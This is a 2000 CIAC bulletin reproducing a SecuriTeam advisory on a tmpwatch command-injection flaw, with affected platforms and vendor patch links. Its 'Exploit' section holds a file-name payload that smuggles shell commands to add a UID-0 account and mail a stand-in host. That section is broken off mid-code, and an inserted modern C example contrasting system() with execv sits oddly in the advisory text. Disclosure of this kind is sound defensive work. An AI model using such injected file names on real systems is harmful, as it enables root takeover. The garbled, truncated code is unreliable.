Linux 'tmpwatch' Vulnerability
CIAC INFORMATION BULLETIN
L-005: Linux 'tmpwatch' Vulnerability
October 16, 2000 16:00 GMT
PROBLEM: The tmpwatch utility has a flaw in the execution of the
system() library subroutine.
PLATFORM:
Red Hat Linux 7.0 (tmpwatch v2.5.1)
Red Hat Linux 6.2 (tmpwatch v2.2)
Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0, prg gráficos, ecommerce, 5.1
Trustix Secure Linux
Mandrake 6.0, 6.1, 7.0, 7.1
Immunix OS 6.2
DAMAGE: By passing arbitrary commands to the system() library
subroutine, a local user account could gain root. By creating
layers of subdirectories in a subdirectory monitored by
tmpwatch, a local user could fill the system process
table. This would cause a denial of service to the system,
requiring a hard reboot.
SOLUTION: Apply the patches specified in the advisory.
VULNERABILITY ASSESSMENT: The risk is MEDIUM. The advisory has been
publicly discussed, with exploit code given.
[****** Begin SecuriTeam Advisory ******]
Insecure call of external programs in tmpwatch
------------------------------------------------------------------------
SUMMARY
The tmpwatch utility is used in Red Hat Linux to remove temporary files.
This utility has an option to call the "fuser" program, which verifies if
a file is currently opened by a process. The fuser program is invoked
within tmpwatch by calling the system() library subroutine. Insecure
handling of the arguments to this subroutine could potentially allow an
attacker to execute arbitrary commands.
DETAILS
Affected Versions:
Red Hat Linux 7.0 (tmpwatch v2.5.1)
Red Hat Linux 6.2 (tmpwatch v2.2)
Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0, prg gráficos, ecommerce, 5.1
Trustix Secure Linux
Mandrake 6.0, 6.1, 7.0, 7.1
Immunix OS 6.2
Immune Versions:
SuSE
Impact:
This vulnerability may allow local attackers to compromise superuser
access if the administrator uses tmpwatch in a non-default manner.
The tmpwatch tool removes files that have not been modified or accessed
within a specified amount of time. It was designed to securely remove
files by avoiding typical race condition vulnerabilities. System
administrators usually run this tool periodically to remove old temporary
files in world-writeable directories.
The tmpwatch tool uses the --fuser or -s options to avoid removing a file
that is in an open state in another process. This option uses the
system() library subroutine to call the external program /sbin/fuser with
the file name being examined as an argument. The system() subroutine
spawns a shell to execute the command. An attacker may create a file name
containing shell metacharacters, which could allow them to execute
arbitrary commands if tmpwatch with the fuser option is used to remove the
file.
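The difference between the call pattern described above and a shell-free one, as an added example that is not tmpwatch's code or the vendors' patch: `build_shell_command` only constructs the string that system() would hand to the shell, and `run_helper` starts the helper with fork and execv so the file name is never parsed. The function names, the sample file name and the use of /bin/echo as a stand-in helper are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Unsafe pattern from the advisory: the file name is pasted into a command
 * line that system() would pass to /bin/sh. This function only builds the
 * string so it can be inspected; nothing is executed. */
int build_shell_command(char *out, size_t n, const char *prog, const char *path)
{
    int len = snprintf(out, n, "%s %s", prog, path);
    return (len < 0 || (size_t)len >= n) ? -1 : 0;
}

/* Hardened pattern: fork + execv with an argv array. No shell parses the
 * name, so it reaches the helper as a single argument whatever bytes it
 * contains. `path` is assumed to be absolute (an assumption of this
 * example) so it cannot be mistaken for an option. Returns the helper's
 * exit status, 127 if it could not be executed, or -1 on error. */
int run_helper(const char *prog, const char *path)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)prog, (char *)path, NULL };
        execv(prog, argv);
        _exit(127); /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *name = "/tmp/demo;echo INJECTED"; /* constructed sample name */
    char cmd[256];

    if (build_shell_command(cmd, sizeof cmd, "/sbin/fuser", name) == 0)
        printf("a shell would parse: %s\n", cmd);
    /* /bin/echo stands in for the helper: it prints the name as one word. */
    printf("helper exit status: %d\n", run_helper("/bin/echo", name));
    return 0;
}
```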
Source code comparison between the Red Hat Linux 6.2 and 7.0 tmpwatch
packages suggests this vulnerability was recognized and a fix was
attempted. However, the fix is incorrect, and the vulnerability is still
exploitable.
Exploit:
1. Compile and run:
#include
int main()
{
FILE *f;
char filename[100] = ";useradd -u 0 -g 0 haks0r;mail haks0r@somehost.com
Recommendations:
Do not use the --fuser or -s options with tmpwatch.
Red Hat has issued the following RPMs that contain fixes for this
vulnerability.
Red Hat Linux 6.2:
Alpha:
ftp://updates.redhat.com/6.2/alpha/tmpwatch-2.6.2-1.6.2.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.2/sparc/tmpwatch-2.6.2-1.6.2.sparc.rpm
i386:
ftp://updates.redhat.com/6.2/i386/tmpwatch-2.6.2-1.6.2.i386.rpm
Sources:
ftp://updates.redhat.com/6.2/SRPMS/tmpwatch-2.6.2-1.6.2.src.rpm
Red Hat Linux 7.0:
i386:
ftp://updates.redhat.com/7.0/i386/tmpwatch-2.6.2-1.7.i386.rpm
Sources:
ftp://updates.redhat.com/7.0/SRPMS/tmpwatch-2.6.2-1.7.src.rpm
Conectiva:
ftp://atualizacoes.conectiva.com.br/4.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
Trustix Secure Linux:
This file can be found at:
http://www.trustix.net/download/Trustix/updates/1.1/RPMS/
Or
ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/
Mandrake:
You can download the updates directly from:
ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates
Linux-Mandrake 6.0:
6.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
6.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 6.1:
6.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
6.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 7.0:
7.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
7.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 7.1:
7.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
7.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Immunix OS 6.2:
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/tmpwatch-2.6.2-1.6.2_StackGuard.i386.rpm
Or
http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/tmpwatch-2.6.2-1.6.2_StackGuard.src.rpm
ADDITIONAL INFORMATION
The information has been provided by X-Force (xforce@ISS.NET),
Alexander Y. Yurchenko (grange@RT.MIPT.RU),
TSL Team (tsl@TRUSTIX.COM), Roman Drahtmueller (draht@SUSE.DE),
Linux Mandrake Security Team (security@LINUX-MANDRAKE.COM),
and Greg KH (greg@WIREX.COM).
[****** End SecuriTeam Advisory ******]
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
CIAC wishes to acknowledge the contributions of Beyond-Security's SecuriTeam for the
information contained in this bulletin.
CIAC services are available to DOE, DOE Contractors, and the NIH. CIAC
can be contacted at:
Voice: +1 925-422-8193 (7 x 24)
FAX: +1 925-423-8002
STU-III: +1 925-423-2604
E-mail: ciac@llnl.gov
World Wide Web: http://www.ciac.org/
http://ciac.llnl.gov
(same machine -- either one will work)
Anonymous FTP: ftp.ciac.org
ciac.llnl.gov
(same machine -- either one will work)
This document was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the University of California nor any of their
employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process
disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products,
process, or service by trade name, trademark, manufacturer, or
otherwise, does not necessarily constitute or imply its endorsement,
recommendation or favoring by the United States Government or the
University of California. The views and opinions of authors expressed
herein do not necessarily state or reflect those of the United States
Government or the University of California, and shall not be used for
advertising or product endorsement purposes.
UCRL-MI-119788